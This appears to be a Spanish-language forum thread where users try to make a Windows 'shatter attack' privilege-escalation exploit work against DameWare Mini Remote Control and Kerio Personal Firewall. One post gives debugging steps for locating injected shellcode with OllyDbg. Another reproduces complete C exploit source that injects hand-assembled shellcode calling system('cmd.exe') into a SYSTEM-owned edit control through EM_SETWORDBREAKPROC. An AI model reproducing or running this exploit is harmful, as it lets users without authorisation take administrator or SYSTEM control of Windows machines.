Yo también tengo problemas con este exploit, una adaptación del que se ha publicado en la revista hakin9, para el DameWare Mini Remote Control


Sin embargo no me funciona y no se por qué. Estoy seguro de que meto la direccion correctamente y de la shellcode es operativa (la he probado con un programa y me crea un usuario con privilegios de administrador).

¿Alguien podría sugerirme algo?

salu2 

Hola,

bueno en mi caso, más que error, es que no me funciona el exploit, y no entiendo por qué.

Esta vulnerabilidad se basa en la manera en que Windows maneja el paso de mensajes entre procesos, fue descubierta por Chris Paget en el 2002, pero en el artículo de hakin9 de Mayo, se propone utilizarla para elevar privilegios con el Kerio Personal Firewall, ya que Microsoft no la conseguido arreglar, pues se trata de un fallo intríseco del kernel. Cualquier aplicación, tenga los privilegios que tenga, pude hacerle llegar un mensaje a cualquier ventana del escritorio. Así si esta ventana corre como system, le mandamos un mensaje de tipo EM_SETWORDBREAKPROC, que lo que hace es que ejecute un quebrado de lineas según una función que le digamos nosotros. Obviamente esa función seá nuestra Shellcode.

Pues hasta ahí bien. Yo quiero conseguir privilegios de administrador en un Windows 200o corriendo el DameWare Mini Remote Control. Compruebo con el Process Explorer que el DameWare corre con privilegios de system, aún cuando se está logeado como usuario, cuando se pincha botón derecho, sobre el icono del escritorio y se selecciona Connect to, la ventana que sale también tiene privilegios de sytem. Es decir, que en principio la aplicación sería vulnerable.

Como se ve la primera parte del exploit busca el handle del Control Edit. Yo lo he modificado ligeramente para que busque el del DameWare. Después pega la shellcode en el control. Esto veo que ocurre correctamente, he comprobado que lo que pega son los nops y al final la shellcode en ASCI.

La direccion retaddr es donde debe hallarse la supuesta funcion para el quebrado de lineas, pero que para nosotros es la de la shellcode, por lo que en tiempo de ejecución abro el Ollydbg, anexo el proceso del DameWare, y busco en la memoria la shellcode, introduciendo en el campo hex 31 c9 83 e9 ca. No tarda en encontrarla, y compruebo que justamente antes se encuentra el colchón de nops que he puesto (1024*1024). Así que cojo una dirección intermedia de este colchón, 0x012BFC00.

Sin embargo, el exploit no funciona, es decir no se crea un usuario con privilegios de administrador. He probado a modificar el exploit para obtener más información de lo que pasa, aprovechando que la función SendMessage con el tipo de mensaje EM_SETWORDBREAKPROC, devuelve el valor 0 cuando el mensaje ha sido procesado con éxito. Pues si modifico la última parte del exploit de la siguiente manera:


Me da el mensaje de mensaje fallido.

He buscado en Bugtraq y me dice que el DameWare desde la versión 3.71 no es vulnerable a este tipo de ataques. Yo estoy utilizando la versión 4.0. por lo que pensé que ésta sería la explicación. Sin embargo pruebo el mismo exploit para el Kerio Personal Firewall, la misma versión que se menciona en el artículo de hakin9, la 2.11, supuestamente vulnerable, y me pasa exactamente igual.

La verdad es que la explicación más sencilla es que introduzco un dirección errónea, pero no sé de que otra manera hacerlo.

¿me puedes echar una mano, Sdc?

salu2

people exploit complet

/*

Shatter attack exploit for DameWare Mini Remote Control Server
by ash@felinemenace.org

see associated advisory

This code is based on shards.cpp by xenophile

*/

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#pragma warning(disable: 4305)
#pragma warning(disable: 4309)
void MakeShellCode (char *buffer)
{
HMODULE hCRT;
void * lpSystem;
int count=0;


while (count < 36)
{
buffer [count] =0x90;
count ++;
}

buffer[37]=0x8B; buffer[38]=0xE5; buffer[39]=0x55;
buffer[40]=0x8B; buffer[41]=0xEC; buffer[42]=0x33;
buffer[43]=0xFF; buffer[44]=0x90; buffer[45]=0x57;
buffer[46]=0x83; buffer[47]=0xEC; buffer[48]=0x04;
buffer[49]=0xC6; buffer[50]=0x45; buffer[51]=0xF8;
buffer[52]=0x63; buffer[53]=0xC6; buffer [54]=0x45;
buffer[55]=0xF9; buffer[56]=0x6D; buffer [57]=0xC6;
buffer[58]=0x45; buffer[59]=0xFA; buffer[60]=0x64;
buffer[61]=0xC6; buffer[62]=0x45; buffer[63]=0xFB;
buffer[64]=0x2E; buffer[65]=0xC6; buffer[66]=0x45;
buffer[67]=0xFC; buffer[68]=0x65; buffer[69]=0xC6;
buffer[70]=0x45; buffer[71]=0xFD; buffer [72]=0x78;
buffer[73]=0xC6; buffer[74]=0x45; buffer [75] =0xFE;
buffer[76]=0x65;

hCRT = LoadLibrary("msvcrt.dll");
lpSystem = (void *)GetProcAddress( hCRT, "system" );
buffer[77]=0xB8;
buffer[78]=((char *)&lpSystem)

• ;

buffer[79]=((char *)&lpSystem) [1];
buffer[80]=((char *)&lpSystem) [2];
buffer[81]=((char *)&lpSystem) [3];
buffer [82] =0x50; buffer[83]=0x8D; buffer[84]=0x45;
buffer[85]=0xF8; buffer[86]=0x50; buffer[87]=0xFF;
buffer [88]=0x55; buffer[89]=0xF4;
count = 90;
while (count < 291)
{
buffer [count] =0x90;
count ++;
}
buffer[291]=0x24; buffer[292]=0xF1; buffer [293]=0x5D;
buffer[294]=0x01; buffer[295]=0x26; buffer[296]=0xF1;
buffer [297] =0x5D; buffer[298]=0x01; buffer[299]=0x00;
buffer[300]=0x00;
return;
}
void ErrorNotify(DWORD err, char *title)
{
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
err,
MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
(LPTSTR) &lpMsgBuf,
0,
NULL
) ;

printf("%s\n",lpMsgBuf);

LocalFree( lpMsgBuf );
};
#define SHELLCODE_SIZE (1024 * 256)
#define SHELLCODE_OFFSET (SHELLCODE_SIZE -400)
int main(int argc, char* argv[])
{
HWND hWnd;
HWND hWndChild;
char sc[SHELLCODE_SIZE];
char szWindowName[] = "About DameWare Mini Remote Control Server";
LONG lExecAddress;
sc[0] = 'x'; sc[1] = 'e'; sc[2] = 'n'; sc[3] = '0';
memset( &sc[4], 0x90, SHELLCODE_SIZE -4);
MakeShellCode( &sc[SHELLCODE_OFFSET] );
printf( "\nfm-shatterdame.c\nash@felinemenace.org\n" );
printf("--------------------------------------------------------------\n");
printf("Exploits shatter attack in DameWare Mini Remote Control Server\n");
printf("This is based on shards.cpp written by xenophile.\n") ;
printf("--------------------------------------------------------------\n");
printf(
"STEP 1: Finding our window!\n"
) ;



hWnd = FindWindow( NULL, szWindowName );
if( hWnd == NULL)
{

printf("Couldn't find the dameware about dialogue. Open it and re-run this\n");
return 0;
}

hWndChild = FindWindowEx(hWnd, NULL, "Edit", NULL);

if( hWndChild == NULL)
{

printf("\tCouldn't find child edit control window\n");

return 0;
}

SendMessage( hWndChild, EM_SETREADONLY, 0, 0 );

SendMessage( hWndChild, EM_SETLIMITTEXT, SHELLCODE_SIZE, 0L );

if ( ! SendMessage( hWndChild, WM_SETTEXT, 0, (LPARAM)sc ) ) {
ErrorNotify ( GetLastError (), "error");
}
printf(
"\n\nSTEP 2: Enter shell code address. "
"This can be found using a debugger."
) ;
printf( "\nOn my XP SP1 machine 0x160000 worked.\n" );

printf( "\n\nEnter execution address: " );
scanf( "%x", &lExecAddress );

if ( ! SendMessage( hWndChild, EM_SETWORDBREAKPROC, 0L,
(LPARAM)lExecAddress ) ) {
ErrorNotify( GetLastError(), "error" );
}

SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON,
(LPARAM)0x000a000a );

return 0;
}
 compiled by dev c++